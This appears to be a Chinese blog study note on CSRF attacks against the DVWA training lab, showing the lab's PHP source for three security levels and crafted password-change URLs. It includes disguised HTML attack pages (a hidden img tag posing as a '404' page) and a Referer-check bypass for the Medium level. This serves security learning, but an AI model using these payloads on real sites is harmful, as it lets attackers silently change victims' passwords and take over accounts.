DVWA之CSRF学习

ゞ浴缸里的玫瑰 2022-05-28 13:45 169阅读 0赞

# DVWA之CSRF学习 #

### CSRF攻击过程及分析 ###

Low级别

![70][]

首先，抓包看一下改密码的传输都有哪些

![70 1][]

得知URL为：

http://用户的ip/DVWA-1.9/vulnerabilities/csrf/?password\_new=输的新密码&password\_conf=输的确认密码&Change=Change\#

当用户A在访问该网站时，只要用户A点击黑客B精心构造的这个URL时就能造成CSRF攻击

构造链接：http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password\_new=123&password\_conf=123&Change=Change\#

LOW级别源码如下：

`<?php`  
  
`if( isset( ``$_GET``[ ``'Change' ``] ) ) {`  
`    ``// Get input`  
`    ``$pass_new  ``= ``$_GET``[ ``'password_new' ``];`  
`    ``$pass_conf ``= ``$_GET``[ ``'password_conf' ``];`  
  
`    ``// Do the passwords match?`  
`    ``if( ``$pass_new ``== ``$pass_conf ``) {`  
`        ``// They do!`  
`        ``$pass_new ``= ``mysql_real_escape_string``( ``$pass_new ``);`  
`        ``$pass_new ``= ``md5``( ``$pass_new ``);`  
  
`        ``// Update the database`  
`        ``$insert ``= ```"UPDATE `users` SET password = '```$pass_new``' WHERE user = '" ``. ``dvwaCurrentUser``() . ``"';"``;`  
`        ``$result ``= ``mysql_query``( ``$insert ``) or die( ``'<pre>' ``. ``mysql_error``() . ``'</pre>' ``);`  
  
`        ``// Feedback for the user`  
`        ``echo ``"<pre>Password Changed.</pre>"``;`  
`    }`  
`    else {`  
`        ``// Issue with passwords matching`  
`        ``echo ``"<pre>Passwords did not match.</pre>"``;`  
`    }`  
  
`    ``mysql_close``();`  
`}`  
  
`?>`

发现以上源码并没有加入任何的过滤和验证，所以可以说是没有防护

当然，这个URL过于明显，稍微有一点知识的人都能看出来这是一个改密码的链接，所以说我们就应该想一下隐藏的放法，比如构造一个HTML文档

文档如下：

Test.html

<**img**src=" http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password\_new=123&password\_conf=123&Change=Change\#"border="0"style="display:none;"/>

<**h1**>404<**h1**>

<**h2**>file notfound.<**h2**>

其中style="display:none;"是不让这个元素显示出来

![70 2][]

当用户打开这个HTML时，以为这是个错误的页面，一般不会在意，但是这样就能把用户的密码改掉了，

![70 3][]

发现密码错误

再试一下改过的密码

![70 4][]

登陆成功

Medium CSRF

![70 5][]

同样，我们先抓包看一下改密码的请求有什么不同

![70 6][]

看一下它的源码：

`<?php`  
  
`if( isset( $_GET[ 'Change' ] ) ) {`  
`    ``// Checks to see where the request came from`  
`    ``if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {`  
`        ``// Get input`  
`        ``$pass_new  = $_GET[ 'password_new' ];`  
`        ``$pass_conf = $_GET[ 'password_conf' ];`  
  
`        ``// Do the passwords match?`  
`        ``if( $pass_new == $pass_conf ) {`  
`            ``// They do!`  
`            ``$pass_new = mysql_real_escape_string( $pass_new );`  
`            ``$pass_new = md5( $pass_new );`  
  
`            ``// Update the database`  
`            ```$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";``  
`            ``$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );`  
  
`            ``// Feedback for the user`  
`            ``echo "<pre>Password Changed.</pre>";`  
`        }`  
`        else {`  
`            ``// Issue with passwords matching`  
`            ``echo "<pre>Passwords did not match.</pre>";`  
`        }`  
`    }`  
`    else {`  
`        ``// Didn't come from a trusted source`  
`        ``echo "<pre>That request didn't look correct.</pre>";`  
`    }`  
  
`    ``mysql_close();`  
`}`  
  
`?>`

发现源码里多了一个这样的对比：` if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )`

是匹配主机名字的，如果主机名与发起请求的名字一样的时候，就可以完成改密码的攻击

那么我们可以构造这样的一个HTML  用户A的主机IP地址为192.168.244.131

192.168.244.131.html  这个网页需要放在攻击者的服务器中

内容如下：

<imgsrc="http://192.168.244.131/DVWA-1.9/vulnerabilities/csrf/?password\_new=123456&password\_conf=123456&Change=Change\#"border="0" style="display:none;"/>

<h2>file not found.<h2>

其中style="display:none;"是不让这个元素显示出来

我们把这个文件放在攻击主机上网站根目录下

![70 7][]

然后在攻击主机上去访问这个文件

![70 8][]

当用户在用密码password登录时发现已经登不上去了

![70 9][]

High CSRF

`<?php`  
  
`if( isset( $_GET[ 'Change' ] ) ) {`  
`    ``// Check Anti-CSRF token`  
`    ``checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );`  
  
`    ``// Get input`  
`    ``$pass_new  = $_GET[ 'password_new' ];`  
`    ``$pass_conf = $_GET[ 'password_conf' ];`  
  
`    ``// Do the passwords match?`  
`    ``if( $pass_new == $pass_conf ) {`  
`        ``// They do!`  
`        ``$pass_new = mysql_real_escape_string( $pass_new );`  
`        ``$pass_new = md5( $pass_new );`  
  
`        ``// Update the database`  
`        ```$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";``  
`        ``$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );`  
  
`        ``// Feedback for the user`  
`        ``echo "<pre>Password Changed.</pre>";`  
`    }`  
`    else {`  
`        ``// Issue with passwords matching`  
`        ``echo "<pre>Passwords did not match.</pre>";`  
`    }`  
  
`    ``mysql_close();`  
`}`  
  
`// Generate Anti-CSRF token`  
`generateSessionToken();`  
  
`?>`

[70]: /images/20220528/7e9042f9747b4167ac2ce7287e3e3fd3.png
[70 1]: /images/20220528/aa3658271c4a43d9b5eb7825bed69ef5.png
[70 2]: /images/20220528/0cde1c14c0a3401abc5d6f21229c460a.png
[70 3]: /images/20220528/c70e3cbf419f410ea6da1c2094a83bac.png
[70 4]: /images/20220528/2b95197b0d264d669d2d75af8b85df2b.png
[70 5]: /images/20220528/9a5f930efb684c0aa4c4dd83ae7ac837.png
[70 6]: /images/20220528/f0634bb441844fda8169bf62594a4457.png
[70 7]: /images/20220528/b5126667cf8f455899a876dd13d31870.png
[70 8]: /images/20220528/315afa35f649467c82bd6dc35d8a5544.png
[70 9]: /images/20220528/bc68b498c61b4470ac1cfb3d6e5da401.png